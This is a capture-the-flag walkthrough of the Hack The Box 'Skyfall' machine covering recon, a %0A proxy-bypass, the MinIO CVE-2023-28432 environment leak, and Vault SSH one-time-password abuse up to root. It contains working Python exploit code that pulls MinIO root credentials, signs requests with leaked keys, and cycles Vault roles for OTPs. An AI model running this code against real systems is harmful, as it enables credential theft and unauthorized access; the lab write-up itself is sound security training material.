Introduction to Skyfall:
This write-up will explore the “Skyfall” machine from Hack the Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Skyfall” machine from Hack The Box by achieving the following objectives:
User Flag:
Exploit Vulnerabilities:
- Exploit a parser issue between nginx and Flask on a demo website to access the MinIO status page and identify the MinIO domain.
- Exploit a MinIO information-disclosure vulnerability to retrieve the root credentials, then access the MinIO cluster and find a backup whose .bashrc contains a Vault token.
Gain Access:
Use the Vault token to authenticate to the Vault instance, list the roles of its SSH secrets engine, and generate a one-time password that grants SSH access.
Root Flag:
Unseal Vault:
Run the sudo-permitted Vault unseal script as root; with debugging enabled it writes a debug.log that is not initially readable.
Enumerating the Skyfall Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine. The scan below runs the default scripts (-sC), detects service versions (-sV) and saves the results in all formats (-oA):
nmap -sC -sV 10.10.11.254 -oA initial
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $nmap -sC -sV 10.10.11.254 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 17:52 EDT
Nmap scan report for 10.10.11.254
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
Analysis:
Port 22 (SSH): Secure Shell service running OpenSSH 8.9p1 for remote access.
Port 80 (HTTP): Web server running nginx 1.18.0; website title is “Skyfall – Introducing Sky Storage!”
Web Enumeration on Skyfall machine:
Perform web enumeration to discover potentially exploitable directories and files. The run below uses the raft small-directories wordlist from SecLists:
gobuster dir -u http://10.10.11.254 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
Gobuster Output:
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $gobuster dir -u http://10.10.11.254 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 178] [--> http://10.10.11.254/assets/]
Progress: 20116 / 20117 (100.00%)
===============================================================
Finished
===============================================================
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
Analysis:
- /assets: Found (Status: 301 Redirect, Size: 178 bytes) [Redirects to: http://10.10.11.254/assets/]
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $gobuster vhost -u http://skyfall.htb/ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://skyfall.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 4989 / 4990 (99.98%)
===============================================================
Finished
===============================================================
Gobuster VHOST Enumeration:
- 4989 of 4990 wordlist entries were sent; no virtual hosts were reported.
- Note the Append Domain: false line in the banner. Without --append-domain, gobuster sends Host: FUZZ rather than Host: FUZZ.skyfall.htb, so a real virtual host under skyfall.htb cannot be detected by this run. The ffuf run below sets the full Host header explicitly, which is why it succeeds where gobuster did not.
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $ffuf -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.skyfall.htb' -u http://skyfall.htb
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://skyfall.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.skyfall.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
old [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 172ms]
mail [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 176ms]
pop [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 183ms]
imap [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
localhost [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 187ms]
mail2 [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
mx [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 186ms]
ns3 [Status: 200, Size: 20631, Words: 4638, Lines: 502, Duration: 187ms]
ffuf VHOST Enumeration:
- Many names return 200, but every hit has exactly the same size (20631 bytes), word count and line count. This is the default site answering for any unknown Host header, not a set of real virtual hosts, so the baseline has to be filtered out (for example with -fs 20631, or automatically with -ac as in the next run).
┌─[✗]─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $ffuf -c -ac -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.skyfall.htb' -u http://skyfall.htb
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://skyfall.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.skyfall.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
demo [Status: 302, Size: 217, Words: 23, Lines: 1, Duration: 237ms]
:: Progress: [4989/4989] :: Job [1/1] :: 225 req/sec :: Duration: [0:00:34] :: Errors: 0 ::
┌─[darknite@parrot]─[~/Documents/htb/skyfall]
└──╼ $
ffuf Command Options:
-c:
Description: Enables colorized output, so the status codes of different hits are easier to tell apart at a glance.
-ac:
Description: Auto-calibration. Before fuzzing, ffuf sends a few requests with random names, records the size, word and line counts of those baseline responses, and then drops every response that matches them. This removes the identical 20631-byte default-page hits from the previous run and leaves only responses that actually differ from the baseline.
Status Code 302 (Found):
The only name that survives calibration answers with a redirect, which marks it as a distinct virtual host:
- demo.skyfall.htb
Website Exploration
A link on the main site points to the demo page, which redirects to the new subdomain, demo.skyfall.htb.
After adding the subdomain to /etc/hosts, the site loads and redirects to a login page. The login page itself displays the credentials guest/guest.
Logging in with them reaches the dashboard.
One task that caught my attention is “Access Minio Storage Security.“
What is Minio Storage Security?
MinIO is a high-performance, software-defined object storage server with an S3-compatible API, designed to run on both consumer and enterprise hardware across several operating systems and architectures.
One of the deployment options is Single-Node Single-Drive (SNSD), or “Standalone” mode: a single MinIO server backed by one storage volume or folder. It provides no reliability or availability beyond what the underlying storage volume itself offers.
SNSD is intended for evaluating MinIO and for early development of applications that need object storage. It uses a zero-parity erasure-coding backend that still supports features such as versioning and object locking/retention.
More information can be found here
Clicking Metrics on the dashboard returns a 403 Forbidden page: the reverse proxy in front of the application blocks that path.
The block can be bypassed by appending %0A (a URL-encoded newline) to the path. The proxy's rule for /metrics no longer matches the altered path, while the Flask application behind it still routes the request to the metrics handler. Keep the %0A in the URL for every request to this page; the byte must reach the server unchanged.
Scrolling down the metrics page reveals the MinIO endpoint.
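The mechanism behind this kind of bypass is a disagreement between the proxy and the back-end about whether "/metrics" followed by a newline is the same path as "/metrics". The block below is an added illustration of that class of mismatch, written for this write-up; it is not the Skyfall nginx or Flask configuration. It models an exact-match deny rule at the proxy beside a back-end route anchored with the Python regex `$`, which also matches just before a trailing newline, and contrasts it with a route anchored with `\Z`. The deny list and route names are hypothetical.

```python
import re
import urllib.parse

# Added illustration of the proxy/back-end mismatch class behind the %0A
# bypass; it is not the Skyfall nginx or Flask configuration.

DENIED_PATHS = {"/metrics"}   # hypothetical exact-match deny rule at the proxy

# Two ways a back-end router can anchor a route regex. In Python, '$' also
# matches just before a trailing newline; '\Z' matches only at the true end.
LOOSE_ROUTE = re.compile(r"^/metrics$")
STRICT_ROUTE = re.compile(r"^/metrics\Z")


def decoded_path(raw_path: str) -> str:
    """Percent-decode the request path once, as both proxy and back-end do."""
    return urllib.parse.unquote(raw_path)


def proxy_allows(raw_path: str) -> bool:
    """Exact-match deny: '/metrics' + newline is not '/metrics', so it passes."""
    return decoded_path(raw_path) not in DENIED_PATHS


def backend_routes(raw_path: str, strict: bool) -> bool:
    """Does the back-end send this path to the /metrics handler?"""
    route = STRICT_ROUTE if strict else LOOSE_ROUTE
    return route.match(decoded_path(raw_path)) is not None


def reaches_handler(raw_path: str, strict: bool) -> bool:
    """The bypass succeeds only when the proxy lets the request through AND
    the back-end still routes it to the protected handler."""
    return proxy_allows(raw_path) and backend_routes(raw_path, strict)


def probe(strict: bool) -> dict:
    """Try the plain path and the usual trailing-byte variants."""
    return {p: reaches_handler(p, strict)
            for p in ("/metrics", "/metrics%0A", "/metrics%0D",
                      "/metrics%20", "/metrics/")}
```

Against a live target the same check is two requests with curl -s -o /dev/null -w '%{http_code}' for /metrics and /metrics%0A (curl passes the encoded byte through untouched); a 403 followed by a 200 is the signature of this mismatch. The fix belongs on both sides: anchor back-end routes with \Z (or re.fullmatch) so a trailing newline is never equivalent to the bare path, and write proxy deny rules as prefix matches rather than exact ones so that decorated variants of a blocked path are still blocked.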
The MinIO build behind that endpoint is affected by an information-disclosure vulnerability, CVE-2023-28432, that exposes the server process's environment variables to an unauthenticated caller.
CVE-2023-28432
MinIO, a Multi-Cloud Object Storage framework, has an information disclosure vulnerability in distributed (cluster) deployments from RELEASE.2019-12-17T23-16-33Z up to, but not including, RELEASE.2023-03-20T20-16-18Z. An unauthenticated POST to the bootstrap verify endpoint returns all environment variables of the process, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. All distributed-deployment users are affected; the fix is to upgrade to RELEASE.2023-03-20T20-16-18Z or later.
The proof of concept (POC) can be found here
Requesting the MinIO endpoint normally results in the error displayed above.
Appending %0A as shown earlier yields the same output as in the screenshot above.
The same response can also be inspected in Burp Suite.
Sensitive information retrieved:
The response contains the environment variables MINIO_ROOT_USER and MINIO_ROOT_PASSWORD. These are the root credentials of the MinIO deployment: whoever holds them has full administrative control of the server and read/write access to every bucket it serves, so from here on the object store is effectively ours.
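The request behind the PoC, as an added example written for this write-up rather than code from the page or from MinIO: it POSTs to the bootstrap verify endpoint named in the advisory and keeps only the credential-bearing variables from the JSON reply. The sample response embedded below is constructed for offline use and is not output captured from the Skyfall box; the endpoint URL passed to probe() is whatever the metrics page disclosed.

```python
import json
import urllib.error
import urllib.request

# Added example for CVE-2023-28432 (not the page's or MinIO's code).
# The endpoint path is the one from the public advisory; SAMPLE_RESPONSE is
# constructed data, not output from the target.

VERIFY_PATH = "/minio/bootstrap/v1/verify"
SENSITIVE_KEYS = ("MINIO_ROOT_USER", "MINIO_ROOT_PASSWORD",
                  "MINIO_ACCESS_KEY", "MINIO_SECRET_KEY")


def extract_credentials(body: bytes) -> dict:
    """Return only the credential variables from a /verify response body.

    An empty dict means the reply carried no MinioEnv block, which is what a
    non-JSON error page or a non-vulnerable reply looks like.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return {}
    env = doc.get("MinioEnv") or {}
    return {k: env[k] for k in SENSITIVE_KEYS if k in env}


def probe(base_url: str, timeout: float = 10.0) -> dict:
    """POST an empty body to the bootstrap verify endpoint without any auth.

    A server that rejects the unauthenticated call surfaces its HTTP status
    under "_http_status" instead of raising, so a scan over several hosts
    can keep going.
    """
    req = urllib.request.Request(base_url.rstrip("/") + VERIFY_PATH,
                                 data=b"", method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return extract_credentials(resp.read())
    except urllib.error.HTTPError as e:
        return {"_http_status": e.code}


# Constructed sample in the shape of a vulnerable server's reply.
SAMPLE_RESPONSE = json.dumps({
    "MinioEndpoints": [{
        "Legacy": False, "SetCount": 1, "DrivesPerSet": 1,
        "Endpoints": [{"Scheme": "http", "Host": "minio-node1:9000",
                       "Path": "/data", "IsLocal": True}],
        "CmdLine": "http://minio-node{1...2}:9000/data",
        "Platform": "OS: linux | Arch: amd64",
    }],
    "MinioEnv": {
        "MINIO_ROOT_USER": "example-root",
        "MINIO_ROOT_PASSWORD": "example-password",
        "MINIO_SERVER_URL": "http://minio-node1:9000",
    },
}).encode()
```

Usage is probe("http://<minio-endpoint>"), with the host taken from the metrics page; a non-empty result is the root credential pair. Note the advisory's scope: the leak only applies to distributed deployments, so a standalone (SNSD) server is not expected to return MinioEnv even on an affected build.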
Exploitation on Skyfall machine
Web Application Exploitation:
Next, download the MinIO Client (mc) binary here to interact with the MinIO server.
We need to grant execute permissions to the file.
What This Command Does:
- Create an alias: mc alias set registers a short name, myminio, for the storage service, so the endpoint and keys do not have to be repeated on every call.
- Connect to storage: the alias ties that name to the server URL together with the access key and secret key recovered from the environment leak above.
- Easier access: afterwards, listings, uploads and downloads are run against the myminio alias instead of the full address and credentials.
The command mc admin info myminio is used with the MinIO Client (mc) to get information about the MinIO server. Here's a breakdown:
What It Does:
- Fetch Server Details: it queries the server the myminio alias points to and shows details such as the server version, its status and storage usage.
Example:
Running mc admin info myminio
will give you a summary of the server, including its version, how much storage is being used, and other technical details. The version string is also the quickest way to confirm that the build is inside the CVE-2023-28432 range.
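What mc does with the alias under the hood, as an added example written for this write-up (not the page's or MinIO's own code): every mc request is signed with AWS Signature Version 4 using the access and secret keys stored for the alias. The block below builds that signature with the standard library only and lists the buckets with a raw GET on the endpoint, which is a quick way to prove the leaked credentials are live even on a host without mc. The endpoint URL, region, key pair, fixed timestamp and the sample XML reply are placeholders or constructed data.

```python
import datetime
import hashlib
import hmac
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET
from typing import Optional

# Added example (not the page's or MinIO's code): the SigV4-signed ListBuckets
# call that `mc ls myminio` performs. ENDPOINT, REGION, the credentials,
# FIXED_TIME and SAMPLE_LIST_XML are placeholders/constructed data.

ENDPOINT = "http://127.0.0.1:9000"   # placeholder for the disclosed MinIO endpoint
REGION = "us-east-1"                 # MinIO's default region
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()
FIXED_TIME = datetime.datetime(2024, 8, 29, 17, 52, 0, tzinfo=datetime.timezone.utc)


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()


def sigv4_headers(method: str, url: str, access_key: str, secret_key: str,
                  region: str = REGION,
                  now: Optional[datetime.datetime] = None) -> dict:
    """SigV4 headers for an S3 request with an empty body.

    Steps: canonical request -> string to sign -> derived signing key -> HMAC.
    """
    now = now or datetime.datetime.now(datetime.timezone.utc)
    amz_date = now.strftime("%Y%m%dT%H%M%SZ")
    datestamp = now.strftime("%Y%m%d")
    parsed = urllib.parse.urlsplit(url)
    canonical_uri = urllib.parse.quote(parsed.path or "/", safe="/")
    canonical_query = "&".join(sorted(parsed.query.split("&"))) if parsed.query else ""

    # Signed headers are lowercase, sorted, and must include host.
    headers = {"host": parsed.netloc, "x-amz-content-sha256": EMPTY_SHA256,
               "x-amz-date": amz_date}
    signed_headers = ";".join(sorted(headers))
    canonical_headers = "".join(f"{k}:{headers[k]}\n" for k in sorted(headers))
    canonical_request = "\n".join([method, canonical_uri, canonical_query,
                                   canonical_headers, signed_headers, EMPTY_SHA256])

    scope = f"{datestamp}/{region}/s3/aws4_request"
    string_to_sign = "\n".join(["AWS4-HMAC-SHA256", amz_date, scope,
                                hashlib.sha256(canonical_request.encode()).hexdigest()])
    k_date = _hmac(("AWS4" + secret_key).encode(), datestamp)
    k_signing = _hmac(_hmac(_hmac(k_date, region), "s3"), "aws4_request")
    signature = hmac.new(k_signing, string_to_sign.encode(), hashlib.sha256).hexdigest()

    return {
        "Host": parsed.netloc,
        "x-amz-date": amz_date,
        "x-amz-content-sha256": EMPTY_SHA256,
        "Authorization": (f"AWS4-HMAC-SHA256 Credential={access_key}/{scope}, "
                          f"SignedHeaders={signed_headers}, Signature={signature}"),
    }


def parse_bucket_list(xml_body: bytes) -> list:
    """Bucket names from a ListAllMyBucketsResult document, ignoring the S3 namespace."""
    root = ET.fromstring(xml_body)
    return [el.text for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "Name" and el.text]


def list_buckets(access_key: str, secret_key: str, endpoint: str = ENDPOINT) -> list:
    """GET / on the endpoint with the leaked root keys; a 200 proves they are live."""
    url = endpoint.rstrip("/") + "/"
    req = urllib.request.Request(
        url, method="GET", headers=sigv4_headers("GET", url, access_key, secret_key))
    with urllib.request.urlopen(req, timeout=10) as resp:
        return parse_bucket_list(resp.read())


# Constructed ListBuckets reply for offline testing (not output from the box).
SAMPLE_LIST_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<ListAllMyBucketsResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Owner><ID>minio</ID><DisplayName>minio</DisplayName></Owner>
  <Buckets>
    <Bucket><Name>backups</Name><CreationDate>2024-01-01T00:00:00.000Z</CreationDate></Bucket>
    <Bucket><Name>logs</Name><CreationDate>2024-01-02T00:00:00.000Z</CreationDate></Bucket>
  </Buckets>
</ListAllMyBucketsResult>"""
```

A signature mismatch comes back as a 403 with a SignatureDoesNotMatch body, and a clock more than 15 minutes off from the server is rejected as RequestTimeTooSkewed, so those two are the first things to check if the call fails with keys you know are valid.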
To view every object in the bucket, download it locally. After browsing the files, another address was found in the .bashrc
file of a backup.
Extract the archive on your local machine.
VAULT_ADDR: the address of the Vault server.
VAULT_TOKEN: the token used to authenticate to it.
How it works:
Export these two variables on your machine so the Vault client knows where to connect and how to authenticate. Every Vault command in the rest of the walkthrough runs with them set.
Vault script
On the target server, vault-ssh-helper
replaces the default Linux password check. When a user attempts to log in, vault-ssh-helper
verifies the supplied password against the Vault server instead of the local password database.
Here's the process:
- Authenticate to Vault and generate a one-time password (OTP) for the target server.
- Connect to the server over SSH and supply the OTP as the password.
If vault-ssh-helper
verifies the OTP, access is granted. After successful authentication, the Vault server deletes the OTP, so each one can be used only once.
We need to download the Vault CLI to our machine and extract it for use.
Connect to Vault with the token from .bashrc, examine the roles of the SSH secrets engine, and generate an OTP for SSH access.
The token authenticates us to Vault.
Listing the SSH roles reveals several options, but the token's policy only permits generating credentials from dev_otp_key_role.
Now, log in using the OTP role:
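The same three steps over Vault's HTTP API, as an added example written for this write-up (not the page's or HashiCorp's code): look up what the token may do, list the roles of the SSH secrets engine, and request an OTP from a role. It also shows the check that explains the previous paragraph: asking each listed role for credentials and treating a 403 as "not permitted by this token's policy". The mount path ssh/, the target IP, the username and the SAMPLE_* responses are assumptions or constructed data. The role name is a parameter, so the identical call with admin_otp_key_role is what the root step later in the walkthrough relies on.

```python
import json
import urllib.error
import urllib.request
from typing import Optional

# Added example (not the page's or HashiCorp's code). SSH_MOUNT, the IP,
# the username and the SAMPLE_* responses are assumptions/constructed data.

SSH_MOUNT = "ssh"   # assumed mount path of the SSH secrets engine


def vault_request(addr: str, token: str, method: str, path: str,
                  body: Optional[dict] = None) -> dict:
    """One call against /v1/<path> with the token in X-Vault-Token.

    Vault uses the custom verb LIST for listings; GET with ?list=true is the
    documented equivalent if something in the path strips unknown verbs.
    """
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(
        f"{addr.rstrip('/')}/v1/{path.lstrip('/')}", data=data, method=method,
        headers={"X-Vault-Token": token, "Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        raw = resp.read()
        return json.loads(raw) if raw else {}


def token_summary(lookup_self: dict) -> dict:
    """Policies and TTL from auth/token/lookup-self: what a leaked token may do."""
    d = lookup_self["data"]
    return {"policies": list(d.get("policies", [])), "ttl": d.get("ttl"),
            "renewable": bool(d.get("renewable", False))}


def role_names(list_response: dict) -> list:
    """Role names from LIST <mount>/roles."""
    return list(list_response.get("data", {}).get("keys", []))


def otp_from_creds(creds: dict) -> dict:
    """Pull the one-time password out of a <mount>/creds/<role> response.

    Only OTP roles return a password; a CA role returns a signed key instead,
    so anything that is not key_type == "otp" is refused.
    """
    d = creds["data"]
    if d.get("key_type") != "otp":
        raise ValueError(f"role issued key_type {d.get('key_type')!r}, not otp")
    return {"otp": d["key"], "username": d["username"],
            "ip": d["ip"], "port": int(d.get("port", 22))}


def issue_ssh_otp(addr: str, token: str, role: str, ip: str, username: str,
                  mount: str = SSH_MOUNT) -> Optional[dict]:
    """Request an OTP for (role, ip, username).

    Returns None when the token's policy forbids the role (Vault answers 403);
    any other failure is raised unchanged.
    """
    try:
        resp = vault_request(addr, token, "POST", f"{mount}/creds/{role}",
                             {"ip": ip, "username": username})
    except urllib.error.HTTPError as e:
        if e.code == 403:
            return None
        raise
    return otp_from_creds(resp)


def usable_roles(addr: str, token: str, ip: str, username: str,
                 mount: str = SSH_MOUNT) -> dict:
    """Map every listed role to an OTP or None; every success is a live OTP,
    so use the one you need right away."""
    roles = role_names(vault_request(addr, token, "LIST", f"{mount}/roles"))
    return {r: issue_ssh_otp(addr, token, r, ip, username, mount) for r in roles}


# Constructed sample responses in the shape Vault returns (not captured from the box).
SAMPLE_LOOKUP = {"data": {"policies": ["default", "developers"], "ttl": 0, "renewable": False}}
SAMPLE_ROLES = {"data": {"keys": ["admin_otp_key_role", "dev_otp_key_role"]}}
SAMPLE_CREDS = {"data": {"key_type": "otp", "key": "0123456789abcdef0123456789abcdef",
                         "username": "devuser", "ip": "10.10.11.254", "port": 22}}
```

With a result in hand, the login is ssh devuser@10.10.11.254 with the OTP pasted as the password (or via sshpass). The Vault CLI collapses the generate-and-connect step into vault ssh -role dev_otp_key_role -mode otp user@host, which is the one-liner the screenshot in the original post corresponds to.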
We can read the user flag by executing the command cat user.txt.
Escalate to Root Privileges Access
Privilege Escalation:
First, check which commands the current user is permitted to run with sudo, as shown by sudo -l.
Let's examine the contents of the YAML file that the sudo-permitted script takes as its configuration.
After executing the following command, we observe that a debug.log
file is created, but it is not readable by us at this point.
Re-run the process, and it works like a charm: this time the log can be read.
Next, replace the existing VAULT_TOKEN from .bashrc with the new token recovered from the log.
With the new token, generate an OTP from admin_otp_key_role
, and we can log in as root!
We can read the root flag by executing the command cat root.txt.